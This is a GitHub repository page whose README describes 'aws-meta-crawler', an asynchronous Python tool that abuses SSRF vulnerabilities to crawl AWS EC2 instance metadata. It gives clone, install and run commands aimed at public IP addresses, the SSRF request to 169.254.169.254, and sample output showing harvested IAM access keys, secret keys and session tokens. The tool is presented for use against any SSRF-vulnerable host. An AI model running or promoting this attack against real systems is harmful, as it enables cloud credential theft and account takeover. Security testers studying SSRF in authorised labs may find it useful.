Skip to content

YarKhan02/aws-meta-crawler

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 

Repository files navigation

AWS SSRF Metadata Crawler

A high-speed, threaded, and recursive AWS metadata enumerator that abuses SSRF vulnerabilities to extract EC2 instance metadata via http://169.254.169.254.


Features

  • Recursive crawling through all metadata folders and subfolders
  • High-speed async implementation using aiohttp and asyncio
  • Nested JSON-style result structure
  • Works with any SSRF-vulnerable host reflecting a url= parameter
  • Skips HTML/noise content, stores only valid data

Installation

git clone https://github.com/yarkhan02/aws-meta-crawler.git
cd aws-meta-crawler
pip install aiohttp

Usage

python3 main.py <target_ip>

Example

python3 main.py 61.29.101.187

Outputs structured metadata like:

{
  "iam": {
    "security-credentials": {
      "cg-ec2-role": {
        "AccessKeyId": "ASIA...",
        "SecretAccessKey": "secret...",
        "Token": "..."
      }
    }
  },
  "hostname": "ip-172-31-22-33.ec2.internal",
  ...
}

What This Tool Does

This crawler abuses an SSRF vulnerability where the remote server allows you to call:

GET /?url=http://169.254.169.254/latest/meta-data/

It then:

  • Crawls all sub-paths and folders recursively
  • Fetches files only (not HTML)
  • Builds a nested JSON dictionary of all keys/values

Example Usage for Saving Output

python3 main.py 54.92.181.147 > metadata.json
jq . metadata.json

Arguments

Argument Description
target_ip IP address of SSRF-vulnerable web service

About

A fast, asynchronous Python tool that recursively crawls AWS EC2 instance metadata via SSRF using aiohttp.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages